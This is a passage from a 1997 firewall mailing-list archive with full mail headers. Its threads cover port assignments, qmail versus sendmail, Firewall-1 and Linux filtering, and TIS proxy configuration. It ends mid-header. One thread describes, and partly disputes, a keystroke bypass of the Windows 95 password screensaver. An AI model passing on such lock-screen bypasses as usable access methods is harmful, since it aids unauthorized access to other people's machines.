firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk See: RFC1700. - paul At 05:41 PM 1/13/97 -0600, blitton@directs.com wrote: > Can someone please tell me where I can find a list of port numbers and > process assigned to it. ie port 80 => http, port 443 => shttp. > > I am especially interested in what port number is assigned to snmp. > > Thanks in advanced and sorry if this is out of topic. > > bruce > -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jan 14 06:30:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29155 for firewalls-outgoing; Tue, 14 Jan 1997 05:40:33 -0800 (PST) Received: from firewall1_int.glaxowellcome.com (firewall1.glaxowellcome.com [192.58.204.204]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA29116 for ; Tue, 14 Jan 1997 05:40:04 -0800 (PST) Received: by firewall1_int.glaxowellcome.com id IAA27852; Tue, 14 Jan 1997 08:46:45 -0500 (EST) Received: from ussun2f.glaxo.com(152.51.19.71) by firewall1.glaxo.com via smap (3.2) id xma027845; Tue, 14 Jan 97 08:46:20 -0500 Received: by ussun2f.glaxo.com id IAA10580; Tue, 14 Jan 1997 08:43:14 -0500 (EST) Date: Tue, 14 Jan 1997 08:43:13 -0500 (EST) From: Gary Hull X-Sender: ggh14854@ussun2f To: PaLaN cc: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW In-Reply-To: <3.0.32.19970114145623.006882b0@202.190.59.4> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, PaLaN wrote: > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. Yes, I have experienced this as well with many systems running Win95. |/ ---o0o-@@-o0o--------- Gary G. Hull - Technical Consultant Howard Systems International - Glaxo Wellcome Inc. Five Moore Drive - Raleigh, North Carolina 27709 Tel : (919) 941-4867 - Fax : (919) 483-0056 email: ggh14854@ussun2f.glaxo.com From firewalls-owner Tue Jan 14 06:46:25 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29350 for firewalls-outgoing; Tue, 14 Jan 1997 05:44:11 -0800 (PST) Received: from telco.com (mail.telco.com [192.190.11.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id FAA29338 for ; Tue, 14 Jan 1997 05:43:53 -0800 (PST) Received: from fod.telco.com ([129.200.3.100]) by firewall.telco.com with SMTP id <77188>; Tue, 14 Jan 1997 08:37:05 -0500 Received: from Norwood-Message_Server by fod.telco.com with Novell_GroupWise; Tue, 14 Jan 1997 08:42:10 -0500 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 14 Jan 1997 08:41:01 -0500 From: John LaMoureux To: sneakers@CS.YALE.EDU, palan@dataprep.com.my, firewalls@GreatCircle.COM Subject: WIN'95 FLAW -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Unfortunately, this flaw can be found in M$ Windows NT as well, both SERVER and WORKSTATION (it works with any screen saver, even those that do not ship with the product.) I would also be interested in any known patch or fix, as I just started deploying NT throughout my enterprise! >>> PaLaN 01/14/97 05:56pm >>> Howdy, I juz encountered a security (i would call it) flaw in M$ Windows'95 screensaver !! I don't know anyone of you encountered this or not but here it goes : If the Windows'95 Screen saver is active, you can break into without any password and all you have to do is : press the "windows" logo key (printed on the M$ keyboard) and there you are. If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have tried this with my own PC and my friends. It works.....try on your own PC. Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here ok..! Let me know if anyone of you encountered this. I'm goin to send M$ a mail on this bug but before that, I need to know whether any patch available for this...thx. rgds, PaLaN From firewalls-owner Tue Jan 14 06:59:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA20219 for firewalls-outgoing; Tue, 14 Jan 1997 01:29:25 -0800 (PST) Received: from hitel.kol.net (hitel.kol.co.kr [204.252.145.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA20201 for ; Tue, 14 Jan 1997 01:29:12 -0800 (PST) Received: from jangca2.kcc.com (pppm80.kol.co.kr [204.252.145.180]) by hitel.kol.net (8.6.9H1/8.6.9) with SMTP id SAA29398; Tue, 14 Jan 1997 18:27:57 +0900 Message-ID: <32DC40B0.18FB@hitel.kol.net> Date: Tue, 14 Jan 1997 18:28:00 -0800 From: sklee Reply-To: klbcardl@hitel.kol.co.kr X-Mailer: Mozilla 3.0 (Win95; I; 16bit) MIME-Version: 1.0 To: PaLaN CC: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW References: <3.0.32.19970114145623.006882b0@202.190.59.4> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PaLaN wrote: > > Howdy, > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. > > Hmmm....M$ still the "King Of Buggy" err...i don't intend to flame M$ here > ok..! Let me know if anyone of you encountered this. > > I'm goin to send M$ a mail on this bug but before that, I need to know > whether any patch available for this...thx. > > rgds, > PaLaN Good !!!!! M$ is crazy boy..... I will try that screen saver start and i put Ctrl+Alt+Delete and i kill screen saver ....that is killed...:-) This is great buggy!! sklee From firewalls-owner Tue Jan 14 07:15:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA22084 for firewalls-outgoing; Tue, 14 Jan 1997 01:49:08 -0800 (PST) Received: from extol.com.my (mail.extol.com.my [202.185.238.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id BAA22042 for ; Tue, 14 Jan 1997 01:48:05 -0800 (PST) Received: by portal.extol.com.my id <21893>; Wed, 15 Jan 1997 01:58:09 +0800 Message-Id: <97Jan15.015809gmt+0800.21893@portal.extol.com.my> Date: Wed, 15 Jan 1997 01:02:44 +0800 From: pclow Reply-To: pclow@pc.jaring.my X-Sender: pclow X-Mailer: Mozilla 4.0b1 (Win95; I) MIME-Version: 1.0 To: PaLaN CC: firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: WIN'95 FLAW X-Priority: Normal References: <3.0.32.19970114145623.006882b0@202.190.59.4> Content-Type: multipart/alternative; boundary="----------702F30E570807" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------702F30E570807 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Palan, I suggest that you do your "research" very carefully before posting. Flame throwers do exist on this list. pc -- What is man that thou are mindful of him? PaLaN wrote: > I juz encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. ------------702F30E570807 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
Palan, 
 
I suggest that you do your "research" very carefully before posting.  Flame throwers
do exist on this list. 
 
pc
-- 
What is man that thou are mindful of him?

 
 PaLaN wrote:

> I juz encountered a security (i would call it) flaw in M$ Windows'95
> screensaver !! I don't know anyone of you encountered this or not but here
> it goes :

> If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have
> tried this with my own PC and my friends. It works.....try on your own PC.

------------702F30E570807-- From firewalls-owner Tue Jan 14 08:27:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA20848 for firewalls-outgoing; Tue, 14 Jan 1997 01:34:00 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id BAA20767 for ; Tue, 14 Jan 1997 01:33:14 -0800 (PST) Message-Id: <199701140933.BAA20767@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA277024326; Tue, 14 Jan 1997 20:32:07 +1100 From: Darren Reed Subject: Re: Secure firewall with only Linux-Kernel filtering possible? To: adam@homeport.org (Adam Shostack) Date: Tue, 14 Jan 1997 20:32:06 +1100 (EDT) Cc: Ryan.Russell@sybase.com, rammeri@winternet.co.at, firewalls@GreatCircle.COM In-Reply-To: <199701140202.VAA16636@homeport.org> from "Adam Shostack" at Jan 13, 97 09:02:10 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't want to throw cold water of the qmail authors' enthusiasm, but a reality check on this comparison seems needed. It is excellent to see someone is doing this but I can't see sendmail fading out the picture any time soon. In some mail from Adam Shostack, sie said: > > qmail sendmail > ----- -------- > 210k tar.gz 900k tar.gz how many lines of code ? the sendmail .tar.gz comes with a _lot_ of other things such as scripts for easy building of sendmail.cf, sample sendmail.cf's, etc. > one setuid (qmail) one (root) setuid program one setuid program is one too many. > designed for security designed to handle complex mail, > like uucp/smtp/chaos I'm sure others *must* have asked this question: how do you use sendmail in conjunction with qmail so you can handle all the various complexities which are found in today's Internet ? > many small confusing one famously painful config file > config files "famously painful" - it is _much_ better than it was. Personally, I would prefer to have one config file (the FWTK has one - netperm-table - but many small programs) rather than try configure many things to interact correctly. Why doesn't someone write a sendmail.cf -> qmail configuration converter and then compare ? > release of the month club bug of the month club > (soon to hit v1.0) bug of the month/release of the month - which do you go for ? They're both bad (but could be worse). It does mean they both receive attention which is good. Not being v1.0 means, to me, it is a young product that has a long way to go before it matures. > (no security holes) Correction: no known security holes (yet). Darren From firewalls-owner Tue Jan 14 08:35:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29970 for firewalls-outgoing; Tue, 14 Jan 1997 05:57:43 -0800 (PST) Received: from lotus.lotus.com (lotus.com [192.233.136.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA29939 for ; Tue, 14 Jan 1997 05:57:23 -0800 (PST) From: Martin_Khoo/SIN/Lotus%LOTUSINT@crd.lotus.com Received: from internet2.lotus.com by lotus.lotus.com (SMI-8.6/SMI-SVR4) id IAA15559; Tue, 14 Jan 1997 08:52:51 -0500 Received: from mta2.lotus.com by internet2.lotus.com (5.x/SMI-SVR4) id AA03553; Tue, 14 Jan 1997 08:49:13 -0500 Received: by mta2.lotus.com(Lotus SMTP MTA v1.05 (274.9 11-27-1996)) id 8525641F.004C95D0 ; Tue, 14 Jan 1997 08:56:30 -0400 X-Lotus-Fromdomain: LOTUSINT@LOTUS@MTA To: pichel@sdm.de Cc: firewalls@greatcircle.com Message-Id: <4825641F.00052211.00@mta2.lotus.com> Date: Tue, 14 Jan 1997 09:01:40 +0900 Subject: Re: (fwd) Firewall-1 query Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IMHO, I would think that you should not be running any other thing on the firewall machine, and certainly NOT sendmail !! I would recommend that you have a separate machine as the mail server running on the DMZ instead. As far as FW-1 is concerned it will allow SMTP traffic to pass so long as your rule-base say so; it does not do any content filtering ; at least not for V2.1. TIS Gauntlet has a SMTP proxy (SMPAD) that you may want to take a look. cheers! Martin Khoo pichel@sdm.de on 01/13/97 09:15:26 PM Please respond to pichel@sdm.de To: firewalls@greatcircle.com cc: (bcc: Martin Khoo/SIN/Lotus) Subject: Re: (fwd) Firewall-1 query > On Thu, 10 Oct 1996 07:01:50 +0100 (BST), Jon Whitton wrote: > > > >I have been looking at firewall-1 as a security solution and have one > >major query. > > > >It appears to work at the IP layer and basically allows or denys packets > >depending on certain rules. (This is only from the Checkpoint web site.) > > > >My question is how does this secure say sendmail since sendmail will be > >running directly on the firewall machine and not a proxy. > >Surely if sendmail is running on the firewall then when (not if!) a new > >bug is found in sendmail, this bug can just be exploited on the firewall. FW-1 doesn't secure sendmail in its protocol-layer (smtp). It just restricts who can speak smtp to whom. This _is_ unsecure regarding SMTP, of course. Use smapd from TIS-FWTK (for free) or wait for Firewall-1 Release 3.0 which comes with content security (filters SMTP-commands and viruses). J"org! -- J"org Pichel |s |d &|m | software design & management | | | | GmbH & Co. KG | | | | Thomas-Dehler-Str. 27 joerg.pichel@sdm.de | | | | 81737 Muenchen Tel/FAX: (089) 63812-112/150 From firewalls-owner Tue Jan 14 08:48:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA27267 for firewalls-outgoing; Tue, 14 Jan 1997 04:50:57 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA27247 for ; Tue, 14 Jan 1997 04:50:32 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vk8JT-0004HuC (Debian Smail-3.2 1996-Jul-4 #2); Tue, 14 Jan 1997 13:49:59 +0100 (MET) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Tue, 14 Jan 97 13:49 MET Received: by lina.inka.de id m0vk7pb-0004igC (Debian Smail-3.2 1996-Jul-4 #2); Tue, 14 Jan 1997 13:19:07 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: Secure firewall with only Linux-Kernel filtering To: rammeri@winternet.co.at Date: Tue, 14 Jan 1997 13:19:06 +0100 (MET) Cc: armin@data.tops.net, firewalls@GreatCircle.COM In-Reply-To: <199701140147.CAA06124@winternet.co.at> from "Ingo Rammer" at Jan 14, 97 02:47:05 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > but there's still a little question running around in the depths of > my brain .. thats .. what are the advantages of, say > altavista-firewall or fw-1 compared to a linux box ... as i know the > i/o system of a sun f.e. is worse than the linux's.... so ....is it > because of > *) greater security? Linux's KErnel Firewalling is stateless. This means some PAckets may slip through. Dynamic Filter Rules for ftp-data or other protocols are not supported. This is no issue if you run ip-masquerade, but then you will need to install additional incomming application proxies. > *) greater flexibility? I cant compare this to FW1, but for Linux you have all the source. > *) graphic setup? This is probably a problem with Linux. You need to know what you are doing. But since this is always the case for a firewall operator, a GUI may DECREASE security of your firewall. There are som grafical setup tools for Linux. There is even a new firewall which is statefuill, called "sf firewall" with dynamical rules and more. This will nly support 2 interfaces right, but IMHO it has all the features needed for filtering. There is a gui for ip-masquerade, too. > *) throuput? Have no comparision for that, but since PC boxes are much cheaper, you can throw a lot of hardware at the problem with Linux. > *) having someone to blame, if it doesn't work? Thats probably your biggest problem. You may need to get a consultatnt for you linux installation and blame her. > but anyway .. i hope it is fairly secure ,) Thats the last word before someone is hacked :) Hope that helps... BTW: has anybody the current prices for a FW1 system including software (not the lite Version) in Europe? Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Tue Jan 14 08:52:21 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA29998 for firewalls-outgoing; Tue, 14 Jan 1997 05:58:32 -0800 (PST) Received: from lotus.lotus.com (lotus.com [192.233.136.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA29977 for ; Tue, 14 Jan 1997 05:58:09 -0800 (PST) From: Martin_Khoo/SIN/Lotus%LOTUSINT@crd.lotus.com Received: from internet2.lotus.com by lotus.lotus.com (SMI-8.6/SMI-SVR4) id IAA15785; Tue, 14 Jan 1997 08:54:37 -0500 Received: from mta2.lotus.com by internet2.lotus.com (5.x/SMI-SVR4) id AA03649; Tue, 14 Jan 1997 08:51:01 -0500 Received: by mta2.lotus.com(Lotus SMTP MTA v1.05 (274.9 11-27-1996)) id 8525641F.004CC0BA ; Tue, 14 Jan 1997 08:58:20 -0400 X-Lotus-Fromdomain: LOTUSINT@LOTUS@MTA To: drexx@sunphil.mozcom.com Cc: firewalls@greatcircle.com Message-Id: <4825641F.0006778C.00@mta2.lotus.com> Date: Tue, 14 Jan 1997 09:15:06 +0900 Subject: Re: TIS FWTK and Solstice FW-1 arguing Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Have u looked at the netperm table setting on the TIS toolkit that specified the setting for the ftp-proxy ? My guess is that it is probably not setup to allow FTP (since you mentioned that bypassing it makes FTP work). What kind of error message did you ge when you try to do FTP ? Another place to look is the FW-1 log. If you did not even see an entry there for the FTP connection then it did not even reach FW-1. cheers! martin khoo drexx@sunphil.mozcom.com on 01/14/97 02:44:57 PM To: firewalls@greatcircle.com, fw-1-mailinglist@us.checkpoint.com cc: (bcc: Martin Khoo/SIN/Lotus) Subject: TIS FWTK and Solstice FW-1 arguing Hello world, Jan. 13, 1996 (10:45pm Manila time) This is a case where the original Sys Admin who setup the old TIS Firewall Toolkit needs to be around. You see, with the following setup: +-------------+--[interior Cisco 2500]--[Solstice Firewall-1]-->Internet | | Windows TIS clients FWTK proxy & DNS server The TIS FWTK is configured as a telnet, mail, and ftp proxy server and also as the DNS server. It runs on a PC with FreeBSD. And managing it is like paying up one's dues in hell. (I know, the server design sucks...) With the Firewall-1 installed, we had a rule saying that FTP is allowed from anywhere to anywhere. But with the TIS FWTK having its say in the matter, we can't get FTP services! We can only have FTP services if we bypass the FTP proxy. Please advise me on how to even start making the two boxes work. Please? Most humble newbie, Drexx. "It's a dirty job, but somebody's gotta do it." -- John Wayne ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ ______ /_____/\ DEXTER D. LAGGUI /_____\\ \ Systems Engineer, Systems Integration Division /_____\ \\ / PHILIPPINE SYSTEMS PRODUCTS INC. /_____/ \/ / / Penthouse, Corporate Business Center /_____/ / \//\ 150 Paseo de Roxas Ave., Legaspi Village \_____\//\ / / Makati City, Philippines \_____/ / /\ / \_____/ \\ \ Phone: (++632) 813-6453 to 55 loc. 222 \_____\ \\ Fax: (++632) 813-3516 \_____\/ Email: drexx@sunphil.mozcom.com ~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~ From firewalls-owner Tue Jan 14 08:56:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA15305 for firewalls-outgoing; Tue, 14 Jan 1997 00:44:54 -0800 (PST) Received: from unitele.com.my ([202.185.128.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA15246 for ; Tue, 14 Jan 1997 00:44:20 -0800 (PST) Received: by acs.unitele.com.my (SMI-8.6/SMI-SVR4) id QAA24624; Tue, 14 Jan 1997 16:42:20 +0800 Date: Tue, 14 Jan 1997 16:42:19 +0800 (SGT) From: Ahmad Munir b Md Ghazali To: Firewalls-Digest@GreatCircle.com Subject: REMOVE Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PLEASE REMOVE s961038@ittm.com.my From firewalls-owner Tue Jan 14 10:16:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA15250 for firewalls-outgoing; Tue, 14 Jan 1997 00:44:26 -0800 (PST) Received: from linda.if.is (linda.if.is [193.4.185.193]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA15167 for ; Tue, 14 Jan 1997 00:43:50 -0800 (PST) Received: from ilmur.if.is by linda.if.is (Secure/IFnet/18-11-96); Tue, 14 Jan 1997 08:14:02 GMT Received: by ilmur.if.is (Secure/IFnet/09-12-96); Tue, 14 Jan 1997 08:14:52 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199701140814.IAA03138@ilmur.if.is> Subject: Re: WIN'95 FLAW To: palan@dataprep.com.my (PaLaN) Date: Tue, 14 Jan 1997 08:14:52 +0000 (GMT) Cc: firewalls@greatcircle.com, sneakers@CS.YALE.EDU In-Reply-To: <3.0.32.19970114145623.006882b0@202.190.59.4> from "PaLaN" at Jan 14, 97 02:56:24 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I juz encountered a security (i would call it) flaw in M$ Windows'95 > screensaver !! I don't know anyone of you encountered this or not but here > it goes : > > If the Windows'95 Screen saver is active, you can break into without any > password and all you have to do is : press the "windows" logo key (printed > on the M$ keyboard) and there you are. > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > tried this with my own PC and my friends. It works.....try on your own PC. This does not work for me, I've not tried to switch over to the English keyboard yet (I'm using Icelandic). Gunni gunni@if.is gunni@coda.is From firewalls-owner Tue Jan 14 10:20:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA01498 for firewalls-outgoing; Tue, 14 Jan 1997 06:27:11 -0800 (PST) Received: from bernie.compusmart.ab.ca (bernie.compusmart.ab.ca [199.185.130.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA01485 for ; Tue, 14 Jan 1997 06:27:00 -0800 (PST) Received: from INTREPID (remote421.compusmart.ab.ca [206.75.85.138]) by bernie.compusmart.ab.ca (8.7.4/8.6.5) with ESMTP id IAA29281 for ; Tue, 14 Jan 1997 08:08:22 -0700 (MST) Message-ID: <32DB97E6.790B@compusmart.ab.ca> Date: Tue, 14 Jan 1997 07:27:51 -0700 From: Bob Russell Reply-To: caeits@compusmart.ab.ca Organization: CAE Aviation Ltd. X-Sender: Bob Russell (Unverified) X-Mailer: Mozilla 4.0b1 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: NEC's PrivateNet Firewall X-Priority: Normal Content-Type: multipart/alternative; boundary="----------38CA64623A00" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------38CA64623A00 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii I'm considering using the NEC PrivateNet Firewall to connect 50 users to the Internet. I like the idea of the packaged hardware/software solution. I'd appreciate any comments from the users of this service on this firewall in comparison to other solutions such as Firewall-1 or Gauntlet. Thanks Bob Russell UNIX Sys Admin CAE Aviation Ltd ------------38CA64623A00 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
I'm considering using the NEC PrivateNet Firewall to connect 50 users to the
Internet. I like the idea of the packaged hardware/software solution. I'd appreciate
any comments from the users of this service on this firewall in comparison to 
other solutions such as Firewall-1 or Gauntlet. 
 
Thanks
 
Bob Russell
UNIX Sys Admin
CAE Aviation Ltd
 
 
------------38CA64623A00-- From firewalls-owner Tue Jan 14 10:25:09 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA02815 for firewalls-outgoing; Tue, 14 Jan 1997 07:00:33 -0800 (PST) Received: from pa0016c1.kpmg.com (pa0016c1.kpmg.com [199.207.255.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA02709 for ; Tue, 14 Jan 1997 06:59:53 -0800 (PST) From: kenng@kpmg.com Received: by pa0016c1.kpmg.com; id JAA26511; Tue, 14 Jan 1997 09:59:49 -0500 (EST) Received: from pa0016c4.kpmg.com(130.100.150.27) by pa0016c1.kpmg.com via smap (3.2) id xma022996; Tue, 14 Jan 97 09:55:05 -0500 Received: from mailgate5.kpmg.com by pa0016c4.kpmg.com(8.7.3/8.7.3) with SMTP id JAA07296 for ; Tue, 14 Jan 1997 09:53:50 -0500 (EST) Received: from ccMail by mailgate5.kpmg.com (IMA Internet Exchange 2.03 (Beta 5) Enterprise) id 000370DF; Tue, 14 Jan 97 10:18:45 -0500 Mime-Version: 1.0 Date: Tue, 14 Jan 1997 09:50:46 -0500 Message-ID: <000370DF.1741@kpmg.com> Subject: stopping email loops on tis firewall To: firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I have a TIS firewall here. Occassionally I experience an email loop with someone on the internet who does not know that email from mailer-daemon is not to be responded to, or have warring vacation programs. Does anyone know of a way to either hold, divert, or nuke any email with a given from or to address? Someone said that it should be doable in sendmail.cf, but I'm not too sure exactly what would need to be done. TIA. From firewalls-owner Tue Jan 14 10:28:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03109 for firewalls-outgoing; Tue, 14 Jan 1997 07:05:54 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03102 for ; Tue, 14 Jan 1997 07:05:38 -0800 (PST) Received: from clonvick-pc.cisco.com (sj-dial-3-14.cisco.com [171.68.179.15]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id HAA03185; Tue, 14 Jan 1997 07:05:28 -0800 (PST) Message-Id: <2.2.32.19970114145433.0075fce8@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 14 Jan 1997 08:54:33 -0600 To: blitton@directs.com, firewalls@GreatCircle.COM From: Chris Lonvick Subject: Re: Question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Bruce, The official protocol assignment list is at: ftp://ftp.isi.edu/in-notes/iana/assignments/port-numbers ---snip--- snmp 161/tcp SNMP snmp 161/udp SNMP snmptrap 162/tcp SNMPTRAP snmptrap 162/udp SNMPTRAP # Marshall Rose ---/snip--- Later, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1-713-778-5663 At 05:41 PM 1/13/97 -0600, blitton@directs.com wrote: > Can someone please tell me where I can find a list of port numbers and > process assigned to it. ie port 80 => http, port 443 => shttp. > > I am especially interested in what port number is assigned to snmp. > > Thanks in advanced and sorry if this is out of topic. > > bruce > > From firewalls-owner Tue Jan 14 10:31:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA03225 for firewalls-outgoing; Tue, 14 Jan 1997 07:07:40 -0800 (PST) Received: from door.NetCS.COM (door.netcs.com [194.120.74.246]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA03174 for ; Tue, 14 Jan 1997 07:06:41 -0800 (PST) Received: from keks.netcs.com [138.199.0.101] by door.NetCS.COM with ESMTP (8.6.10/25-eef) id RAA28627; Tue, 14 Jan 1997 17:05:14 +0100 Received: from slowy (slowy.netcs.com [138.199.32.21]) by keks.netcs.com (8.6.8.1/SCA-6.6) with SMTP id PAA14283; Tue, 14 Jan 1997 15:05:29 GMT Message-ID: <32DB9FD7.7266@netcs.com> Date: Tue, 14 Jan 1997 16:01:43 +0100 From: Oliver Korfmacher Reply-To: okorf@netcs.com Organization: NetCS GmbH X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: WIN'95 FLAW References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Not for NT4, at least not in germany:-) > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > Yes, I have experienced this as well with many systems running Win95. > |/ > ---o0o-@@-o0o--------- > > Gary G. Hull - Technical Consultant > Howard Systems International - Glaxo Wellcome Inc. > Five Moore Drive - Raleigh, North Carolina 27709 > Tel : (919) 941-4867 - Fax : (919) 483-0056 > email: ggh14854@ussun2f.glaxo.com -- Gruesse, Oliver Korfmacher (okorf@netcs.com, whois OK11 URL: http://www.netcs.com/PEOPLE/okorf.html) From firewalls-owner Tue Jan 14 10:33:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA02657 for firewalls-outgoing; Tue, 14 Jan 1997 06:57:41 -0800 (PST) Received: from exch-bel1.attachmate.com (exch-bel1.attachmate.com [149.82.1.46]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA02639 for ; Tue, 14 Jan 1997 06:57:28 -0800 (PST) Received: by exch-bel1.attachmate.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC01E7.D9B51E10@exch-bel1.attachmate.com>; Tue, 14 Jan 1997 06:54:56 -0800 Message-ID: From: Darren Cromer To: "'PaLaN'" , "'firewalls@greatcircle.com'" Subject: RE: WIN'95 FLAW Date: Tue, 14 Jan 1997 06:56:07 -0800 X-Mailer: 